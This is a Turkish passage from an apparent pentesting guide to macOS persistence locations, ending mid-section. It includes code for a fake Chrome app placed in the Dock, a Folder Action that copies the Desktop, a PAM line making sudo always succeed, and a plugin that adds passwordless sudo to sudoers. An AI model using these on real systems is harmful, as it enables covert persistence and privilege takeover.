* **`at`**'ı **çalıştırmanız** ve etkin olması **gerekmektedir**

#### **Açıklama**

`at` görevleri, belirli zamanlarda yürütülmek üzere **tek seferlik görevlerin zamanlamasını** sağlamak için tasarlanmıştır. Cron işleri gibi, `at` görevleri otomatik olarak yürütmeden sonra kaldırılır. Bu görevlerin sistem yeniden başlatmaları arasında kalıcı olduğunu unutmamak önemlidir, bu da onları belirli koşullar altında potansiyel güvenlik endişeleri olarak işaretler. 

**Varsayılan olarak** devre dışı bırakılmışlardır ancak **root** kullanıcısı bunları **etkinleştirebilir**.
```bash
sudo launchctl load -F /System/Library/LaunchDaemons/com.apple.atrun.plist
```
Bu, 1 saat içinde bir dosya oluşturacaktır:
```bash
echo "echo 11 > /tmp/at.txt" | at now+1
```
İş kuyruğunu `atq` kullanarak kontrol edin:
```shell-session
sh-3.2# atq
26	Tue Apr 27 00:46:00 2021
22	Wed Apr 28 00:29:00 2021
```
Yukarıda iki zamanlanmış iş görebiliriz. İşin detaylarını `at -c İŞNUMARASI` kullanarak yazdırabiliriz.
```shell-session
sh-3.2# at -c 26
#!/bin/sh
# atrun uid=0 gid=0
# mail csaby 0
umask 22
SHELL=/bin/sh; export SHELL
TERM=xterm-256color; export TERM
USER=root; export USER
SUDO_USER=csaby; export SUDO_USER
SUDO_UID=501; export SUDO_UID
SSH_AUTH_SOCK=/private/tmp/com.apple.launchd.co51iLHIjf/Listeners; export SSH_AUTH_SOCK
__CF_USER_TEXT_ENCODING=0x0:0:0; export __CF_USER_TEXT_ENCODING
MAIL=/var/mail/root; export MAIL
PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin; export PATH
PWD=/Users/csaby; export PWD
SHLVL=1; export SHLVL
SUDO_COMMAND=/usr/bin/su; export SUDO_COMMAND
HOME=/var/root; export HOME
LOGNAME=root; export LOGNAME
LC_CTYPE=UTF-8; export LC_CTYPE
SUDO_GID=20; export SUDO_GID
_=/usr/bin/at; export _
cd /Users/csaby || {
echo 'Execution directory inaccessible' >&2
exit 1
}
unset OLDPWD
echo 11 > /tmp/at.txt
```
{% hint style="warning" %}
Eğer AT görevleri etkin değilse, oluşturulan görevler yürütülmeyecektir.
{% endhint %}

**İş dosyaları** `/private/var/at/jobs/` dizininde bulunabilir.
```
sh-3.2# ls -l /private/var/at/jobs/
total 32
-rw-r--r--  1 root  wheel    6 Apr 27 00:46 .SEQ
-rw-------  1 root  wheel    0 Apr 26 23:17 .lockfile
-r--------  1 root  wheel  803 Apr 27 00:46 a00019019bdcd2
-rwx------  1 root  wheel  803 Apr 27 00:46 a0001a019bdcd2
```
Dosya adı sırayı, iş numarasını ve çalışma zamanını içerir. Örneğin `a0001a019bdcd2`'ye bakalım.

* `a` - bu kuyruktur
* `0001a` - onaltılık iş numarası, `0x1a = 26`
* `019bdcd2` - onaltılık zaman. Bu, epoch'tan bu yana geçen dakikaları temsil eder. `0x019bdcd2`, ondalık olarak `26991826`'dır. 60 ile çarptığımızda `1619509560` elde ederiz, bu da `GMT: 2021 Nisan 27, Salı 7:46:00`'yi temsil eder.

İş dosyasını yazdırırsak, `at -c` kullanarak elde ettiğimiz bilgileri içerdiğini görürüz.

### Klasör Eylemleri

Açıklama: [https://theevilbit.github.io/beyond/beyond\_0024/](https://theevilbit.github.io/beyond/beyond\_0024/)\
Açıklama: [https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d](https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d)

* Kum havuzunu atlamak için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
* Ancak **`System Events`** ile iletişim kurabilmek için `osascript`'i argümanlarla çağırabilmeniz gerekir.
* TCC atlatma: [🟠](https://emojipedia.org/large-orange-circle)
* Masaüstü, Belgeler ve İndirmeler gibi bazı temel TCC izinlerine sahiptir

#### Konum

* **`/Library/Scripts/Folder Action Scripts`**
* Kök izni gereklidir
* **Tetikleyici**: Belirtilen klasöre erişim
* **`~/Library/Scripts/Folder Action Scripts`**
* **Tetikleyici**: Belirtilen klasöre erişim

#### Açıklama ve Sömürü

Klasör Eylemleri, bir klasördeki değişikliklerle otomatik olarak tetiklenen betiklerdir; öğeler eklenirken, kaldırılırken veya diğer eylemler gerçekleşirken veya klasör penceresinin açılması veya yeniden boyutlandırılması gibi diğer eylemlerle tetiklenirler. Bu eylemler çeşitli görevler için kullanılabilir ve Finder UI veya terminal komutları kullanılarak tetiklenebilirler.

Klasör Eylemleri kurmak için şu seçeneklere sahipsiniz:

1. [Automator](https://support.apple.com/guide/automator/welcome/mac) ile bir Klasör Eylemi iş akışı oluşturup bir hizmet olarak yüklemek.
2. Bir betiği manuel olarak bir klasörün bağlam menüsündeki Klasör Eylemleri Kurulumu aracılığıyla eklemek.
3. Programatik olarak bir Klasör Eylemi kurmak için `System Events.app`'e Apple Olayı iletileri göndermek için OSAScript'i kullanmak.
* Bu yöntem, eylemi sisteme gömmek ve kalıcılık düzeyi sunmak için özellikle kullanışlıdır.

Aşağıdaki betik, bir Klasör Eylemi tarafından yürütülebilecek bir örnektir:
```applescript
// source.js
var app = Application.currentApplication();
app.includeStandardAdditions = true;
app.doShellScript("touch /tmp/folderaction.txt");
app.doShellScript("touch ~/Desktop/folderaction.txt");
app.doShellScript("mkdir /tmp/asd123");
app.doShellScript("cp -R ~/Desktop /tmp/asd123");
```
Yukarıdaki betiği Klasör Eylemleri tarafından kullanılabilir hale getirmek için şunu kullanarak derleyin:
```bash
osacompile -l JavaScript -o folder.scpt source.js
```
Derlemesi yapıldıktan sonra, aşağıdaki betiği çalıştırarak Klasör İşlemlerini ayarlayın. Bu betik, Klasör İşlemlerini genel olarak etkinleştirecek ve önceden derlenmiş betiği özel olarak Masaüstü klasörüne ekleyecektir.
```javascript
// Enabling and attaching Folder Action
var se = Application("System Events");
se.folderActionsEnabled = true;
var myScript = se.Script({name: "source.js", posixPath: "/tmp/source.js"});
var fa = se.FolderAction({name: "Desktop", path: "/Users/username/Desktop"});
se.folderActions.push(fa);
fa.scripts.push(myScript);
```
Ayar dosyasını şu şekilde çalıştırın:
```bash
osascript -l JavaScript /Users/username/attach.scpt
```
* Bu kalıcılığı GUI aracılığıyla uygulamanın yolu:

Bu, yürütülecek olan betiktir:

{% code title="source.js" %}
```applescript
var app = Application.currentApplication();
app.includeStandardAdditions = true;
app.doShellScript("touch /tmp/folderaction.txt");
app.doShellScript("touch ~/Desktop/folderaction.txt");
app.doShellScript("mkdir /tmp/asd123");
app.doShellScript("cp -R ~/Desktop /tmp/asd123");
```
{% endcode %}

Aşağıdaki komutla derleyin: `osacompile -l JavaScript -o folder.scpt source.js`

Taşıyın:
```bash
mkdir -p "$HOME/Library/Scripts/Folder Action Scripts"
mv /tmp/folder.scpt "$HOME/Library/Scripts/Folder Action Scripts"
```
Ardından, `Folder Actions Setup` uygulamasını açın, **izlemek istediğiniz klasörü seçin** ve durumunuzda **`folder.scpt`**'yi seçin (benim durumumda ona output2.scp adını verdim):

<figure><img src="../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1).png" alt="" width="297"><figcaption></figcaption></figure>

Şimdi, eğer o klasörü **Finder** ile açarsanız, betiğiniz çalıştırılacaktır.

Bu yapılandırma, base64 formatında **`~/Library/Preferences/com.apple.FolderActionsDispatcher.plist`** konumunda saklanmıştır.

Şimdi, GUI erişimi olmadan bu kalıcılığı hazırlamayı deneyelim:

1. **`~/Library/Preferences/com.apple.FolderActionsDispatcher.plist`**'yi yedeklemek için `/tmp`'ye kopyalayın:
* `cp ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist /tmp`
2. Şimdi, ayarladığınız Klasör Eylemlerini **kaldırın**:

<figure><img src="../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

Şimdi boş bir ortama sahip olduğumuza göre

3. Yedek dosyasını kopyalayın: `cp /tmp/com.apple.FolderActionsDispatcher.plist ~/Library/Preferences/`
4. Bu yapılandırmayı tüketmek için Folder Actions Setup.app'ı açın: `open "/System/Library/CoreServices/Applications/Folder Actions Setup.app/"`

{% hint style="danger" %}
Ve bu benim için çalışmadı, ama bunlar yazıdan talimatlar:(
{% endhint %}

### Dock kısayolları

Yazı: [https://theevilbit.github.io/beyond/beyond\_0027/](https://theevilbit.github.io/beyond/beyond\_0027/)

* Kum havuzunu atlamak için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
* Ancak, sisteme kötü amaçlı bir uygulama yüklemiş olmanız gerekmektedir
* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)

#### Konum

* `~/Library/Preferences/com.apple.dock.plist`
* **Tetikleyici**: Kullanıcı dock içindeki uygulamaya tıkladığında

#### Açıklama ve Sömürü

Dock'ta görünen tüm uygulamalar, plist içinde belirtilmiştir: **`~/Library/Preferences/com.apple.dock.plist`**

Sadece şu şekilde bir uygulama **eklemek mümkündür**:

{% code overflow="wrap" %}
```bash
# Add /System/Applications/Books.app
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/System/Applications/Books.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'

# Restart Dock
killall Dock
```
{% endcode %}

Bazı **sosyal mühendislik** kullanarak, örneğin Dock içinde **Google Chrome gibi taklit edebilir** ve aslında kendi betiğinizi çalıştırabilirsiniz:
```bash
#!/bin/sh

# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)

rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null

# Create App structure
mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS
mkdir -p /tmp/Google\ Chrome.app/Contents/Resources

# Payload to execute
echo '#!/bin/sh
open /Applications/Google\ Chrome.app/ &
touch /tmp/ImGoogleChrome' > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome

chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome

# Info.plist
cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleExecutable</key>
<string>Google Chrome</string>
<key>CFBundleIdentifier</key>
<string>com.google.Chrome</string>
<key>CFBundleName</key>
<string>Google Chrome</string>
<key>CFBundleVersion</key>
<string>1.0</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleIconFile</key>
<string>app</string>
</dict>
</plist>
EOF

# Copy icon from Google Chrome
cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns

# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Google Chrome.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
killall Dock
```
### Renk Seçiciler

Açıklama: [https://theevilbit.github.io/beyond/beyond\_0017](https://theevilbit.github.io/beyond/beyond\_0017/)

* Kum havuzunu atlamak için kullanışlı: [🟠](https://emojipedia.org/large-orange-circle)
* Çok belirli bir eylem gerçekleşmesi gerekiyor
* Başka bir kum havuzunda sonlanacaksınız
* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)

#### Konum

* `/Library/ColorPickers`
* Kök erişimi gereklidir
* Tetikleyici: Renk seçicisini kullanın
* `~/Library/ColorPickers`
* Tetikleyici: Renk seçicisini kullanın

#### Açıklama ve Sömürü

Kodunuzla birlikte bir renk seçici paketini derleyin (örneğin [**bu örneği kullanabilirsiniz**](https://github.com/viktorstrate/color-picker-plus)) ve bir yapılandırıcı ekleyin (benzer şekilde [Ekran Koruyucu bölümünde](macos-auto-start-locations.md#screen-saver) olduğu gibi) ve paketi `~/Library/ColorPickers` dizinine kopyalayın.

Sonra, renk seçicisi tetiklendiğinde sizin de tetiklenmeniz gerekmektedir.

Kütüphanenizi yükleyen ikili dosyanın **çok kısıtlayıcı bir kum havuzu** olduğunu unutmayın: `/System/Library/Frameworks/AppKit.framework/Versions/C/XPCServices/LegacyExternalColorPickerService-x86_64.xpc/Contents/MacOS/LegacyExternalColorPickerService-x86_64`

{% code overflow="wrap" %}
```bash
[Key] com.apple.security.temporary-exception.sbpl
[Value]
[Array]
[String] (deny file-write* (home-subpath "/Library/Colors"))
[String] (allow file-read* process-exec file-map-executable (home-subpath "/Library/ColorPickers"))
[String] (allow file-read* (extension "com.apple.app-sandbox.read"))
```
{% endcode %}

### Finder Senkronizasyon Eklentileri

**Açıklama**: [https://theevilbit.github.io/beyond/beyond\_0026/](https://theevilbit.github.io/beyond/beyond\_0026/)\
**Açıklama**: [https://objective-see.org/blog/blog\_0x11.html](https://objective-see.org/blog/blog\_0x11.html)

* Kum havuzunu atlamak için kullanışlı mı: **Hayır, çünkü kendi uygulamanızı çalıştırmanız gerekir**
* TCC atlaması: ???

#### Konum

* Belirli bir uygulama

#### Açıklama ve Sızma

Bir Finder Senkronizasyon Uzantısı örneği içeren bir uygulama [**burada bulunabilir**](https://github.com/D00MFist/InSync).

Uygulamalar `Finder Senkronizasyon Uzantıları`na sahip olabilir. Bu uzantı, çalıştırılacak bir uygulamanın içine gidecektir. Dahası, uzantının kodunu çalıştırabilmesi için **bazı geçerli Apple geliştirici sertifikalarıyla imzalanmış olması gerekir**, **kum havuzunda olmalıdır** (rahatlatılmış istisnalar eklenmiş olabilir) ve şuna benzer bir şeyle kaydedilmiş olmalıdır:
```bash
pluginkit -a /Applications/FindIt.app/Contents/PlugIns/FindItSync.appex
pluginkit -e use -i com.example.InSync.InSync
```
### Ekran Koruyucu

Açıklama: [https://theevilbit.github.io/beyond/beyond\_0016/](https://theevilbit.github.io/beyond/beyond\_0016/)\
Açıklama: [https://posts.specterops.io/saving-your-access-d562bf5bf90b](https://posts.specterops.io/saving-your-access-d562bf5bf90b)

* Kum havuzunu atlamak için kullanışlı: [🟠](https://emojipedia.org/large-orange-circle)
* Ancak genel bir uygulama kum havuzunda sonlanacaksınız
* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)

#### Konum

* `/System/Library/Screen Savers`
* Root gerekli
* **Tetikleyici**: Ekran koruyucusunu seçin
* `/Library/Screen Savers`
* Root gerekli
* **Tetikleyici**: Ekran koruyucusunu seçin
* `~/Library/Screen Savers`
* **Tetikleyici**: Ekran koruyucusunu seçin

<figure><img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" width="375"><figcaption></figcaption></figure>

#### Açıklama ve Sömürü

Xcode'da yeni bir proje oluşturun ve yeni bir **Ekran Koruyucu** oluşturmak için şablonu seçin. Ardından, örneğin aşağıdaki kodu kullanarak kodunuzu ekleyin.

**Derleyin** ve `.saver` paketini **`~/Library/Screen Savers`** dizinine kopyalayın. Sonra, Ekran Koruyucu GUI'yi açın ve üzerine tıkladığınızda birçok log oluşturmalıdır:

{% code overflow="wrap" %}
```bash
sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "hello_screensaver"'

Timestamp                       (process)[PID]
2023-09-27 22:55:39.622369+0200  localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver void custom(int, const char **)
2023-09-27 22:55:39.622623+0200  localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView initWithFrame:isPreview:]
2023-09-27 22:55:39.622704+0200  localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView hasConfigureSheet]
```
{% endcode %}

{% hint style="danger" %}
Bu kodu yükleyen ikili dosyanın ayrıcalıklarında (`/System/Library/Frameworks/ScreenSaver.framework/PlugIns/legacyScreenSaver.appex/Contents/MacOS/legacyScreenSaver`) **`com.apple.security.app-sandbox`** bulunduğundan dolayı **ortak uygulama kum havuzunun içinde olacaksınız**.
{% endhint %}

Saver kodu:
```objectivec
//
//  ScreenSaverExampleView.m
//  ScreenSaverExample
//
//  Created by Carlos Polop on 27/9/23.
//

#import "ScreenSaverExampleView.h"

@implementation ScreenSaverExampleView

- (instancetype)initWithFrame:(NSRect)frame isPreview:(BOOL)isPreview
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
self = [super initWithFrame:frame isPreview:isPreview];
if (self) {
[self setAnimationTimeInterval:1/30.0];
}
return self;
}

- (void)startAnimation
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
[super startAnimation];
}

- (void)stopAnimation
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
[super stopAnimation];
}

- (void)drawRect:(NSRect)rect
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
[super drawRect:rect];
}

- (void)animateOneFrame
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
return;
}

- (BOOL)hasConfigureSheet
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
return NO;
}

- (NSWindow*)configureSheet
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
return nil;
}

__attribute__((constructor))
void custom(int argc, const char **argv) {
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
}

@end
```
### Spotlight Eklentileri

yazı: [https://theevilbit.github.io/beyond/beyond\_0011/](https://theevilbit.github.io/beyond/beyond\_0011/)

* Kum havuzunu atlamak için kullanışlı: [🟠](https://emojipedia.org/large-orange-circle)
* Ancak uygulama kum havuzunda sona ereceksiniz
* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)
* Kum havuzu çok sınırlı görünüyor

#### Konum

* `~/Kütüphane/Spotlight/`
* **Tetikleyici**: Spotlight eklentisi tarafından yönetilen bir uzantıya sahip yeni bir dosya oluşturulduğunda.
* `/Kütüphane/Spotlight/`
* **Tetikleyici**: Spotlight eklentisi tarafından yönetilen bir uzantıya sahip yeni bir dosya oluşturulduğunda.
* Root gerekli
* `/Sistem/Kütüphane/Spotlight/`
* **Tetikleyici**: Spotlight eklentisi tarafından yönetilen bir uzantıya sahip yeni bir dosya oluşturulduğunda.
* Root gerekli
* `Some.app/İçerik/Kütüphane/Spotlight/`
* **Tetikleyici**: Spotlight eklentisi tarafından yönetilen bir uzantıya sahip yeni bir dosya oluşturulduğunda.
* Yeni uygulama gereklidir

#### Açıklama ve Sömürü

Spotlight, macOS'in yerleşik arama özelliğidir ve kullanıcılara **bilgisayarlarındaki verilere hızlı ve kapsamlı erişim** sağlamak amacıyla tasarlanmıştır.\
Bu hızlı arama yeteneğini kolaylaştırmak için Spotlight, **özel bir veritabanı** tutar ve çoğu dosyayı **ayıklamak suretiyle bir dizin oluşturur**, böylece dosya adları ve içerikleri üzerinden hızlı aramalar yapılabilir.

Spotlight'ın temel mekanizması, 'mds' adlı merkezi bir süreci içerir ve bu süreç, Spotlight hizmetini yönetir. Buna ek olarak, farklı dosya türlerini dizinlemek gibi çeşitli bakım görevlerini yerine getiren çeşitli 'mdworker' cinleri bulunmaktadır (`ps -ef | grep mdworker`). Bu görevler, Spotlight içinde çeşitli dosya biçimlerini anlamasını ve dizinlemesini sağlayan Spotlight içe aktarıcı eklentileri veya **".mdimporter paketleri**" aracılığıyla mümkün hale getirilir.

Eklentiler veya **`.mdimporter`** paketleri önceden belirtilen yerlerde bulunur ve yeni bir paket göründüğünde dakikalar içinde yüklenir (herhangi bir hizmeti yeniden başlatmaya gerek yoktur). Bu paketler, hangi **dosya türü ve uzantıları yönetebileceklerini** belirtmelidir; bu şekilde, belirtilen uzantıya sahip yeni bir dosya oluşturulduğunda Spotlight onları kullanacaktır.

Yüklenmiş tüm `mdimporters`'ları **bulmak mümkündür:**
```bash
mdimport -L
Paths: id(501) (
"/System/Library/Spotlight/iWork.mdimporter",
"/System/Library/Spotlight/iPhoto.mdimporter",
"/System/Library/Spotlight/PDF.mdimporter",
[...]
```
Ve örneğin **/Library/Spotlight/iBooksAuthor.mdimporter** bu tür dosyaları işlemek için kullanılır (`.iba` ve `.book` uzantıları arasında):
```json
plutil -p /Library/Spotlight/iBooksAuthor.mdimporter/Contents/Info.plist

[...]
"CFBundleDocumentTypes" => [
0 => {
"CFBundleTypeName" => "iBooks Author Book"
"CFBundleTypeRole" => "MDImporter"
"LSItemContentTypes" => [
0 => "com.apple.ibooksauthor.book"
1 => "com.apple.ibooksauthor.pkgbook"
2 => "com.apple.ibooksauthor.template"
3 => "com.apple.ibooksauthor.pkgtemplate"
]
"LSTypeIsPackage" => 0
}
]
[...]
=> {
"UTTypeConformsTo" => [
0 => "public.data"
1 => "public.composite-content"
]
"UTTypeDescription" => "iBooks Author Book"
"UTTypeIdentifier" => "com.apple.ibooksauthor.book"
"UTTypeReferenceURL" => "http://www.apple.com/ibooksauthor"
"UTTypeTagSpecification" => {
"public.filename-extension" => [
0 => "iba"
1 => "book"
]
}
}
[...]
```
{% hint style="danger" %}
Başka `mdimporter`'ın Plist'ini kontrol ederseniz, **`UTTypeConformsTo`** girdisini bulamayabilirsiniz. Bu, yerleşik bir _Uniform Type Identifiers_ ([UTI](https://en.wikipedia.org/wiki/Uniform\_Type\_Identifier)) olduğu için uzantıları belirtmeye gerek duymaz.

Ayrıca, Sistem varsayılan eklentileri her zaman önceliklidir, bu nedenle bir saldırgan yalnızca Apple'ın kendi `mdimporters` tarafından dizinlenmeyen dosyalara erişebilir.
{% endhint %}

Kendi içe aktarıcınızı oluşturmak için bu projeye başlayabilirsiniz: [https://github.com/megrimm/pd-spotlight-importer](https://github.com/megrimm/pd-spotlight-importer) ve ardından adı değiştirin, **`CFBundleDocumentTypes`**'ı değiştirin ve desteklemek istediğiniz uzantıları desteklemesi için **`UTImportedTypeDeclarations`** ekleyin ve bunları **`schema.xml`**'de yansıtın.\
Ardından, **`GetMetadataForFile`** işlevinin kodunu değiştirerek, işlenen uzantıya sahip bir dosya oluşturulduğunda payload'unuzu çalıştırabilirsiniz.

Son olarak, yeni `.mdimporter`'ınızı bir önceki konumlardan birine derleyin ve kopyalayın ve yüklendiğinde **günlükleri izleyerek** veya **`mdimport -L`** kontrol ederek kontrol edebilirsiniz.

### ~~Tercih Paneli~~

{% hint style="danger" %}
Bu artık çalışmıyor gibi görünmüyor.
{% endhint %}

Açıklama: [https://theevilbit.github.io/beyond/beyond\_0009/](https://theevilbit.github.io/beyond/beyond\_0009/)

* Kum havuzunu atlamak için kullanışlı: [🟠](https://emojipedia.org/large-orange-circle)
* Belirli bir kullanıcı eylemi gerektirir
* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)

#### Konum

* **`/System/Library/PreferencePanes`**
* **`/Library/PreferencePanes`**
* **`~/Library/PreferencePanes`**

#### Açıklama

Bu artık çalışmıyor gibi görünmüyor.

## Root Kum Havuzu Atlatma

{% hint style="success" %}
Burada, **kum havuzu atlatma** için yararlı olan başlangıç konumlarını bulabilirsiniz, bu da sadece bir dosyaya **yazarak** basitçe bir şeyi **yürütmenizi sağlar** ve **root** olmanızı ve/veya diğer **garip koşulları gerektirir.**
{% endhint %}

### Periyodik

Açıklama: [https://theevilbit.github.io/beyond/beyond\_0019/](https://theevilbit.github.io/beyond/beyond\_0019/)

* Kum havuzunu atlamak için kullanışlı: [🟠](https://emojipedia.org/large-orange-circle)
* Ancak root olmanız gerekiyor
* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)

#### Konum

* `/etc/periodic/daily`, `/etc/periodic/weekly`, `/etc/periodic/monthly`, `/usr/local/etc/periodic`
* Root gereklidir
* **Tetikleyici**: Zaman geldiğinde
* `/etc/daily.local`, `/etc/weekly.local` veya `/etc/monthly.local`
* Root gereklidir
* **Tetikleyici**: Zaman geldiğinde

#### Açıklama ve Sömürü

Periyodik betikler (**`/etc/periodic`**), `/System/Library/LaunchDaemons/com.apple.periodic*`'de yapılandırılmış **başlatma hizmetleri** nedeniyle yürütülür. `/etc/periodic/`'de depolanan betikler dosya sahibi olarak **yürütülür**, bu nedenle bu, olası bir ayrıcalık yükseltmesi için çalışmayacaktır.
{% code overflow="wrap" %}
```bash
# Launch daemons that will execute the periodic scripts
ls -l /System/Library/LaunchDaemons/com.apple.periodic*
-rw-r--r--  1 root  wheel  887 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-daily.plist
-rw-r--r--  1 root  wheel  895 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-monthly.plist
-rw-r--r--  1 root  wheel  891 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-weekly.plist

# The scripts located in their locations
ls -lR /etc/periodic
total 0
drwxr-xr-x  11 root  wheel  352 May 13 00:29 daily
drwxr-xr-x   5 root  wheel  160 May 13 00:29 monthly
drwxr-xr-x   3 root  wheel   96 May 13 00:29 weekly

/etc/periodic/daily:
total 72
-rwxr-xr-x  1 root  wheel  1642 May 13 00:29 110.clean-tmps
-rwxr-xr-x  1 root  wheel   695 May 13 00:29 130.clean-msgs
[...]

/etc/periodic/monthly:
total 24
-rwxr-xr-x  1 root  wheel   888 May 13 00:29 199.rotate-fax
-rwxr-xr-x  1 root  wheel  1010 May 13 00:29 200.accounting
-rwxr-xr-x  1 root  wheel   606 May 13 00:29 999.local

/etc/periodic/weekly:
total 8
-rwxr-xr-x  1 root  wheel  620 May 13 00:29 999.local
```
{% endcode %}

Başka periyodik betikler de **`/etc/defaults/periodic.conf`** dosyasında belirtilir:
```bash
grep "Local scripts" /etc/defaults/periodic.conf
daily_local="/etc/daily.local"				# Local scripts
weekly_local="/etc/weekly.local"			# Local scripts
monthly_local="/etc/monthly.local"			# Local scripts
```
Eğer `/etc/daily.local`, `/etc/weekly.local` veya `/etc/monthly.local` dosyalarından herhangi birini yazmayı başarırsanız, **er ya da geç yürütülecektir**.

{% hint style="warning" %}
Periyodik betik, **betiğin sahibi olarak yürütülecektir**. Dolayısıyla, eğer düzenli bir kullanıcı betiğin sahibiyse, betik o kullanıcı olarak yürütülecektir (bu, ayrıcalık yükseltme saldırılarını engelleyebilir).
{% endhint %}

### PAM

Yazı: [Linux Hacktricks PAM](../linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md)\
Yazı: [https://theevilbit.github.io/beyond/beyond\_0005/](https://theevilbit.github.io/beyond/beyond\_0005/)

* Kum havuzunu atlamak için kullanışlı: [🟠](https://emojipedia.org/large-orange-circle)
* Ancak root olmanız gerekmektedir
* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)

#### Konum

* Her zaman kök gereklidir

#### Açıklama ve Sömürü

PAM, macOS içinde kolay yürütmeden ziyade **kalıcılık** ve kötü amaçlı yazılımlara daha fazla odaklandığı için, bu blog detaylı bir açıklama sunmayacak, **bu teknik hakkında daha iyi anlamak için yazıları okuyun**.

PAM modüllerini kontrol etmek için:
```bash
ls -l /etc/pam.d
```
Bir süreklilik/privilege escalation tekniği PAM'ı kötüye kullanarak /etc/pam.d/sudo modülünü değiştirerek kolayca yapılabilir. Başlangıca şu satırı eklemek yeterlidir:
```bash
auth       sufficient     pam_permit.so
```
Yani bu şöyle **görünecek**:
```bash
# sudo: auth account password session
auth       sufficient     pam_permit.so
auth       include        sudo_local
auth       sufficient     pam_smartcard.so
auth       required       pam_opendirectory.so
account    required       pam_permit.so
password   required       pam_deny.so
session    required       pam_permit.so
```
Ve dolayısıyla **`sudo` kullanma girişimi başarılı olacaktır**.

{% hint style="danger" %}
Bu dizin TCC tarafından korunduğundan, kullanıcının erişim isteyen bir uyarı alması oldukça olasıdır.
{% endhint %}

### Yetkilendirme Eklentileri

Açıklama: [https://theevilbit.github.io/beyond/beyond\_0028/](https://theevilbit.github.io/beyond/beyond\_0028/)\
Açıklama: [https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65](https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65)

* Kum havuzunu atlamak için kullanışlı: [🟠](https://emojipedia.org/large-orange-circle)
* Ancak root olmanız ve ek yapılandırmalar yapmanız gerekmektedir
* TCC atlatma: ???

#### Konum

* `/Library/Security/SecurityAgentPlugins/`
* Root gereklidir
* Eklentiyi kullanmak için yetkilendirme veritabanını yapılandırmak da gereklidir

#### Açıklama ve Sömürü

Kullanıcı oturum açtığında kalıcılığı sürdürmek için yürütülecek bir yetkilendirme eklentisi oluşturabilirsiniz. Bu eklentilerden birini nasıl oluşturacağınız hakkında daha fazla bilgi için önceki açıklamalara bakın (ve dikkat edin, kötü yazılmış bir eklenti sizi dışarıda bırakabilir ve Mac'inizi kurtarma modundan temizlemeniz gerekebilir).
```objectivec
// Compile the code and create a real bundle
// gcc -bundle -framework Foundation main.m -o CustomAuth
// mkdir -p CustomAuth.bundle/Contents/MacOS
// mv CustomAuth CustomAuth.bundle/Contents/MacOS/

#import <Foundation/Foundation.h>

__attribute__((constructor)) static void run()
{
NSLog(@"%@", @"[+] Custom Authorization Plugin was loaded");
system("echo \"%staff ALL=(ALL) NOPASSWD:ALL\" >> /etc/sudoers");
}
```
**Birleşimi** yüklenmesi gereken konuma taşıyın:
```bash
cp -r CustomAuth.bundle /Library/Security/SecurityAgentPlugins/
```
Son olarak, bu Eklentiyi yüklemek için **kuralı** ekleyin:
```bash
cat > /tmp/rule.plist <<EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>class</key>
<string>evaluate-mechanisms</string>
<key>mechanisms</key>
<array>
<string>CustomAuth:login,privileged</string>
</array>
</dict>
</plist>
EOF

